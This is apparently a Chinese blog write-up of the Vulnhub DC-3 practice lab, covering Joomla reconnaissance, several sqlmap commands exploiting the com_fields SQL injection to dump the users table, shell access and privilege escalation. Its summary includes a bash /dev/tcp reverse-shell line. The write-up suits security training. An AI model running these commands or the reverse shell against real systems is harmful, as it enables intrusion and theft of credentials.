4.29练习【Vulnhub靶机系列】DC3

探测主机IP

 

探测开放端口,nmap -A简单扫一下详细信息

框架好像是用的joomla,一会可以用这个框架的专用扫描器扫扫

 

进它的首页看看

 

 

先不管这么多,我们已经找到登入点了,之前我们用nmap扫出此网站用的框架是joomla

用专门扫它的工具试试

安装joomscan工具的命令是sudo apt-get install joomscan

装完开扫

 

 

 

 

Sqlmap -u "http://192.168.191.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

 

 

sqlmap -u "http://192.168.191.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

sqlmap -u "http://192.168.191.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]爆字段

sqlmap -u "http://192.168.191.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' -C id,name,password,username --dump爆数据

 

 

 

可以尝试拿shell了

 

 

 

访问主页,kali监听

 

提权

 

 

这个exp之前好像用过,试试这个

 

 

 

好像要去下一个33972的压缩包,然后里面有exp

那去下载吧

 

 

总结:

  1. joomla框架有个专门的扫描器,kali没预装安装命令sudo apt-get install joomscan
  2. 知道了框架版本可以搜索框架版本漏洞,安装教程一步一步复现
  3. Php反弹shell语句今天忘了怎么写,可以用这个system("bash ‐c 'bash ‐i >& /dev/tcp/ip/端口 0>&1'");   执行后nc监听一下端口
  4. 提权的话找系统漏洞一个个试,github上下载exp,wget频繁报错ssl失败什么的,网上说可以修改hosts文件,或者加--no-check-certificate --no-cookie等参数,但是我研究了几个小时,到最后都没解决,最后是在本机上找到一个可以下载的地方下载了扔过去的
  5. 有框架尽量去寻找前人的智慧,毕竟我是个小菜鸡,真要一个个试慢慢挖估计得很久很久
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值